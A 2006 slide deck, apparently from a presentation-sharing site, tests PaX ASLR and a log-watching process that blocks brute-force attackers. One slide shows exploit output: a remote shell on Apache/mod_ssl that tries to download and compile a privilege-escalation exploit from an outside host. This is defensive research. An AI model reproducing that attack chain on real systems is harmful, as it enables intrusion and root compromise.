address space randomization
play

Address Space Randomization A n E f f e c t i v e I m p l e m e n - PowerPoint PPT Presentation

Jan 06, 2024 •397 likes •560 views

Address Space Randomization A n E f f e c t i v e I m p l e m e n t a t i o n Michael Cloppert May, 2006 Address Space Randomization Theory Randomize location of memory objects Libraries Heap User, kernel-space stack Foils attacks like

  1. Address Space Randomization A n E f f e c t i v e I m p l e m e n t a t i o n Michael Cloppert May, 2006

  2. Address Space Randomization Theory Randomize location of memory objects Libraries Heap User, kernel-space stack Foils attacks like buffer overflows Addresses of needed libraries are not predictable, hard-coded memory locations not portable Paired with non-executable stack, claims to “end arbitrary code execution” [3]

  3. A failure to convert... A return-to-libc overflow example casts doubt on these claims mmap() randomization only introduces 16 bits of entropy in 32-bit architectures This is sufficiently small to brute-force A brute-force return-to-libc attack on Apache can be successful in 216 seconds [1]

  4. What We Will See... H.Shacham et al. have already shown claims of “guaranteed end of arbitrary code execution” aren’t accurate [1,3], BUT... Claims that such protection effectively buys little in the area of security[1] are also inaccurate Implementation makes all the difference These mechanisms can be implemented with a simple watcher process to adequately protect a system, despite claims to the contrary!

  5. grsecurity Combined effort with PaX ASLR [3], is implementation of choice Also provides: Non-executable stack & heap controls, other randomizations (IP, TCP, etc.) Per-process & executable configuration Violation monitoring & alerting via syslog Limited automated response capabilities Kill process under attack to prevent brute-force mmap() layout discovery ASLR problems still exist [1,4]

  6. The Approach 1. Identify an exploit with which to test 2. Build vulnerable target system 3. Build identical target system with PaX ASLR protections 4. Identify attack indicators 5. Build simple process to monitor & respond to attack on PaX ASLR 6. Determine effectiveness of response

  7. The Exploit OpenSSL SSLv2 Malformed Client Key Remote Buffer Overflow [5] Same vuln. as “Slapper” worm; potential implementation of brute-force mentioned in [1]. PoC code; Not ret2libc, but will suffice for our purposes: W^X will completely prevent this attack (tested) Not testing effectiveness of attack, but effectiveness & timing of response. Attack indicators will be the same Attack effectiveness tested against unprotected system

  8. The Target System Fedora Core 1, Linux kernel 2.4.32 with and without grsecurity kernel patch Implemented in VMWare virtual network Snapshots allowed for easy fall-back for multiple simulations from identical environments Apache 1.3.20, mod_ssl 2.8.1, openSSL 0.9.6 Associated grsecurity kernel patch for protected system One system, two kernels: one protected, one not

  9. Attack Indicators Conveniently for us, it’s ALL recorded in syslog: Apr 28 09:38:56 fc1-grsec kernel: PAX: From 172.16.145.1: execution attempt in: <anonymous mapping>, 0816f000-08207000 00000000 Apr 28 09:38:56 fc1-grsec kernel: PAX: terminating task: /usr/local/apache/bin/ httpd(httpd):24806 , uid/euid: 99/99, PC: 081d65d0, SP: 5a0d4d3c Apr 28 09:38:56 fc1-grsec kernel: PAX: bytes at PC: eb 0a 90 90 90 90 90 90 d0 e8 16 08 31 db 89 e7 8d 77 10 89 Apr 28 09:38:56 fc1-grsec kernel: PAX: bytes at SP-4: 00000002 080da2c7 081de688 00000000 00001078 00000000 081d0310 0816e6b8 081d0310 080c6e83 081de688 00000000 000000c8 080c6ddf 00000000 0816e6b8 081d0310 080c49a6 081d0310 081d0310 081d03e8

  10. Attack Response Identify when PaX detects a remote execution attempt in invalid memory block Block associated IP address Don’t re-invent wheel: iptables This is a simple real-time parse of system log, making system calls when necessary Trivially implemented in Perl as PoC (58 lines)

  11. Results Attack against vulnerable system succeeds [cloppemj@files bid_5363-apache_mod_ssl]$ ./OpenFuckV2 0x45 fc1 Establishing SSL connection cipher: 0x8164308 ciphers: 0x83dbc68 Ready to send shellcode Spawning shell... bash: no job control in this shell bash-2.05b$ bash-2.05b$ --10:29:20-- http://packetstormsecurity.nl/0304- exploits/ptrace-kmod.c => `ptrace-kmod.c' Resolving packetstormsecurity.nl... failed: Host not found. gcc: ptrace-kmod.c: No such file or directory gcc: no input files rm: cannot remove `ptrace-kmod.c': No such file or directory bash: ./p: No such file or directory bash-2.05b$ bash-2.05b$ whoami nobody bash-2.05b$ hostname fc1-grsec bash-2.05b$ Attack against protected system fails, and all further communication blocked [cloppemj@files bid_5363-apache_mod_ssl]$ ./OpenFuckV2 0x45 fc1 Establishing SSL connection cipher: 0x8164308 ciphers: 0x81d5f40 Ready to send shellcode Spawning shell... Good Bye! [cloppemj@files bid_5363-apache_mod_ssl]$ ping fc1 PING vm-128 (172.16.145.128) 56(84) bytes of data. From vm-128 (172.16.145.128) icmp_seq=0 Destination Port Unreachable From vm-128 (172.16.145.128) icmp_seq=1 Destination Port Unreachable

  12. Watcher Process Effectiveness Recall: in 216 seconds, it’s too late [1] Massively parallel, coordinated attack could reduce this time significantly, possibly iterate through enough offsets to exploit How quickly is response implemented? In 10 identical tests, the time between first packet of exploit and packet rejects from block Mean: 540.7665 ms Std. Dev.: 220.2321 ms

  13. What does this mean? How much of the address space can be brute-forced in 0.540s, worst case, over a T-1 link (1.544Mb)? Assume processing time of exploit by target is negligible Assume negligible latency Assume infinite listening processes Exploits = Exploit Bytes (exploit/bytes) * Bandwidth (bytes/sec) * Time Available (s) = 1/6158 (incl. all packet overhead, both directions) * 202375.168 * 0.54 = 17 Even when LAN speeds are considered (1145 exploits), this is a miniscule fraction of the 2^16 possible addresses that need to be tried

  14. Conclusions Address layout randomization is not a silver bullet, as claimed [3] Watcher processes can be effective in addressing problems of the technology, despite claims to the contrary [1] Even simple implementation nearly eliminates the ability to discover memory offsets remotely via brute-force, blocking attacks in a half second

  15. References [1] H.Shacham et al. On the effectiveness of address-space randomization . Proceedings of the 11th ACM conference on Computer and communications security, Washington DC, 2004. [2] The PaX Team, Documentation for the PaX Project, http:// pax.grsecurity.net/docs/ [3] grsecurity, http://www.grsecurity.net/ [4] Tyler Durden. Bypassing PaX ASLR protection. Phrack Magazine , 59(9). July, 2002. http://www.phrack.org/show.php? p=59&a=9. [5] John McDonald et al. Bugtraq mailing list. http:// www.securityfocus.com/bid/5363. July, 2002.

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Br Breaking Kern rnel Ad Address ss Space La Layout Randomization (KASLR LR) wi with th

Br Breaking Kern rnel Ad Address ss Space La Layout Randomization (KASLR LR) wi with th

Br Breaking Kern rnel Ad Address ss Space La Layout Randomization (KASLR LR) wi with th Intel TSX Yeongjin Jang , Sangho Lee, and Taesoo Kim Georgia Institute of Technology Kernel Address Space Layout Randomization (KASLR) A

1.2k views • 102 slides
Kernel Address Space Layout Randomization http://outflux.net/slides/2013/lss/kaslr.pdf gholzer

Kernel Address Space Layout Randomization http://outflux.net/slides/2013/lss/kaslr.pdf gholzer

Kernel Address Space Layout Randomization http://outflux.net/slides/2013/lss/kaslr.pdf gholzer Linux Security Summit, New Orleans 2013 Kees Cook &lt;keescook@google.com&gt; (pronounced Case) Overview Classic Attack Structure

431 views • 15 slides
Experience with MAC Address Randomization in Windows 10 Christian Huitema Huitema@microsoft.com

Experience with MAC Address Randomization in Windows 10 Christian Huitema Huitema@microsoft.com

Experience with MAC Address Randomization in Windows 10 Christian Huitema Huitema@microsoft.com IETF 93, Prague, July 2015 MAC Randomization in WIndows 10 - 7/20/2015 1 IETF 93 MAC Address Randomization controlled from Windows 10 Wi-Fi UI

311 views • 6 slides
P Starting at address 0, going to address MAX prog 0 But where do addresses come from? MOV

P Starting at address 0, going to address MAX prog 0 But where do addresses come from? MOV

Memory Management Basics 1 Basic Memory Management Concepts Address spaces MAX sys Physical address space The address space supported by the hardware Starting at address 0, going to address MAX sys MAX prog Logical/virtual address space

448 views • 22 slides
Processs Address Space Linux Address Space 0x7fffffff Stack Data (Heap) Data (Heap)

Processs Address Space Linux Address Space 0x7fffffff Stack Data (Heap) Data (Heap)

10/21/2014 Processes, Address Spaces, and PROCESS Memory Management A running program and its associated data Jonathan Misurda jmisurda@cs.pitt.edu Processs Address Space Linux Address Space 0x7fffffff Stack Data (Heap) Data (Heap)

579 views • 3 slides
Recall: Address Space Map Somet imes St ack Biggest Reserved f or (Space f or local var

Recall: Address Space Map Somet imes St ack Biggest Reserved f or (Space f or local var

Recall: Address Space Map Somet imes St ack Biggest Reserved f or (Space f or local var iables et c. Vir t ual OS 13: Memory Management For each nest ed pr ocedur e call) Address St ack Point er Last Modif ied: Heap (Space f or

322 views • 8 slides
Randomization Algorithm Theory WS 2012/13 Fabian Kuhn Randomization Randomized Algorithm: An

Randomization Algorithm Theory WS 2012/13 Fabian Kuhn Randomization Randomized Algorithm: An

Chapter 6 Randomization Algorithm Theory WS 2012/13 Fabian Kuhn Randomization Randomized Algorithm: An algorithm that uses (or can use) random coin flips in order to make decisions We will see: randomization can be a powerful tool to Make

497 views • 21 slides
Program address space What does the OS loader do? 0x7ffffffff0000 Stack 8MB reserved Creates

Program address space What does the OS loader do? 0x7ffffffff0000 Stack 8MB reserved Creates

Program address space What does the OS loader do? 0x7ffffffff0000 Stack 8MB reserved Creates new process Sets up address space/segments Read executable file, load instructions, init global data 0x7ffff770000 Shared library

844 views • 16 slides
IP Version 6 The explosive growth of the Internet IPv4 address space, 32-bit Real-time

IP Version 6 The explosive growth of the Internet IPv4 address space, 32-bit Real-time

IP Version 6 The explosive growth of the Internet IPv4 address space, 32-bit Real-time and interactive applications Expanded address space, 128 bits Simplified header format Enabling easier processing of IP datagrams

852 views • 15 slides
Main Memory Goals for Today Protection: Address Spaces What is an Address Space?

Main Memory Goals for Today Protection: Address Spaces What is an Address Space?

Main Memory Goals for Today Protection: Address Spaces What is an Address Space? How is it Implemented? Address Translation Schemes Segmentation Paging Paging Multi-level translation Inverted page tables

461 views • 44 slides
Recap What are the three components of a process? Address space CPU context OS

Recap What are the three components of a process? Address space CPU context OS

Recap What are the three components of a process? Address space CPU context OS resources What are the steps of a context switching? Save &amp; restore CPU context Change address space and other info in the PCB 1 Process

430 views • 18 slides
Virtual Memory Separate the concept of: address space (name) from physical memory address

Virtual Memory Separate the concept of: address space (name) from physical memory address

Virtual Memory Separate the concept of: address space (name) from physical memory address (location) Most common example today: wireless (cell) phones Phone number is your id or name Location varies as you move Maintain a Map between name

208 views • 20 slides
A PKI for IP Address Space and AS Numbers Dr. Stephen Kent Chief Scientist - Information

A PKI for IP Address Space and AS Numbers Dr. Stephen Kent Chief Scientist - Information

A PKI for IP Address Space and AS Numbers Dr. Stephen Kent Chief Scientist - Information Security Why A PKI? All proposals for improving the security of BGP rely on a secure infrastructure that attests to address space and AS number

252 views • 13 slides
New Venice Your Address In Space Master Thesis Defense Suzana Bianco May 3rd, 2018

New Venice Your Address In Space Master Thesis Defense Suzana Bianco May 3rd, 2018

New Venice Your Address In Space Master Thesis Defense Suzana Bianco May 3rd, 2018 sdbianco@uh.edu Imagine... It is the year 2070. The existing space economy is thriving. There are many facilities scattered across Cislunar space

429 views • 42 slides
File Systems Storing Information Applications can store it in the process address space

File Systems Storing Information Applications can store it in the process address space

File Systems Storing Information Applications can store it in the process address space Why is it a bad idea? Size is limited to size of virtual address space May not be sufficient for airline reservations, banking, etc. The

1.07k views • 69 slides
Info formation Leaks Kyriakos Kyriakou kkyria16@cs.ucy.ac.cy University of Cyprus EPL 682:

Info formation Leaks Kyriakos Kyriakou kkyria16@cs.ucy.ac.cy University of Cyprus EPL 682:

Info formation Leaks Kyriakos Kyriakou kkyria16@cs.ucy.ac.cy University of Cyprus EPL 682: Advanced Security Topics 1 Ju Just st-in in-tim time Code Reuse On the effectiveness of Fine-Grained Address Space Layout Randomization Kevin Z.

1.82k views • 180 slides
PaX (http://pageexec.virtualave.net) The Guaranteed End of Arbitrary Code Execution Who am I?

PaX (http://pageexec.virtualave.net) The Guaranteed End of Arbitrary Code Execution Who am I?

PaX (http://pageexec.virtualave.net) The Guaranteed End of Arbitrary Code Execution Who am I? Brad Spengler The only grsecurity developer NOT a PaX developer Computer Engineering major, Mathematics minor What is PaX? Quite

596 views • 37 slides
How to Randomize? Bastien MICHEL Aarhus University &amp; TrygFondens Center Course Overview

How to Randomize? Bastien MICHEL Aarhus University &amp; TrygFondens Center Course Overview

YEF ITCIL ILO - JPAL Evalu luat ating ing Youth th Employmen loyment t Prog ogramm ammes: : An Execu ecutiv tive e Course 22 26 June 2015 ITCILO Turin, Italy TRANSLATING RESEARCH INTO ACTION How to Randomize? Bastien MICHEL

798 views • 56 slides
JATA Market 59% Want JATA To Expand 1 In 6 Automobile Drivers Research Routes &amp; Schedules

JATA Market 59% Want JATA To Expand 1 In 6 Automobile Drivers Research Routes &amp; Schedules

JATA Market 59% Want JATA To Expand 1 In 6 Automobile Drivers Research Routes &amp; Schedules Also Ride JATA! Study Throughout the County! Did you know? About 70% of study participants countywide consider JATA service to be important to

721 views • 50 slides
POLICY ADVISORY COMMITTEE ENVIRONMENTAL ANALYSIS PHASE Agenda 1. Welcome and introductions. 2.

POLICY ADVISORY COMMITTEE ENVIRONMENTAL ANALYSIS PHASE Agenda 1. Welcome and introductions. 2.

February 28, 2019 POLICY ADVISORY COMMITTEE ENVIRONMENTAL ANALYSIS PHASE Agenda 1. Welcome and introductions. 2. Election of officer(s). 3. Overview of project activities and process. 4. Public engagement update. 5. Health Impact

699 views • 58 slides
PE PEPR PReC eC Partnered Evidence-based Policy Resource Center VETERANS HEALTH

PE PEPR PReC eC Partnered Evidence-based Policy Resource Center VETERANS HEALTH

Design Choices in Randomized Partnered Evaluations: Veteran-Directed Home and Community Based Services Melissa M Garrido, PhD @GarridoMelissa PE PEPR PReC eC Partnered Evidence-based Policy Resource Center VETERANS HEALTH ADMINISTRATION

531 views • 18 slides
Fast Randomized Iteration: Diffusion Monte Carlo through the Lens of Numerical Linear Algebra

Fast Randomized Iteration: Diffusion Monte Carlo through the Lens of Numerical Linear Algebra

Fast Randomized Iteration: Diffusion Monte Carlo through the Lens of Numerical Linear Algebra Raul Platero December 1, 2017 1 / 13 August 2017, Lek-Heng Lim, Jonathan Weare Modification to diffusion Monte Carlo techniques to solve common

461 views • 13 slides
Delegating to private operators the counseling of young graduates jobseekers : Lessons from a

Delegating to private operators the counseling of young graduates jobseekers : Lessons from a

Delegating to private operators the counseling of young graduates jobseekers : Lessons from a French randomized experiment Batrice Sdillot, French Ministry of Labor - Dares Bruno Crpon, Crest and Poverty Action Lab Summary 1. The context 2.

727 views • 34 slides
Dynamic Region-biased Rapidly-exploring Random Trees by Jory Denny, Read Sandstrom, Andrew

Dynamic Region-biased Rapidly-exploring Random Trees by Jory Denny, Read Sandstrom, Andrew

Dynamic Region-biased Rapidly-exploring Random Trees by Jory Denny, Read Sandstrom, Andrew Bregger, and Nancy M. Amato University of Richmond, Richmond VA, USA Texas A&amp;M University, College Station, TX, USA Presenter: Jae Won Choi RRT

962 views • 51 slides

More recommend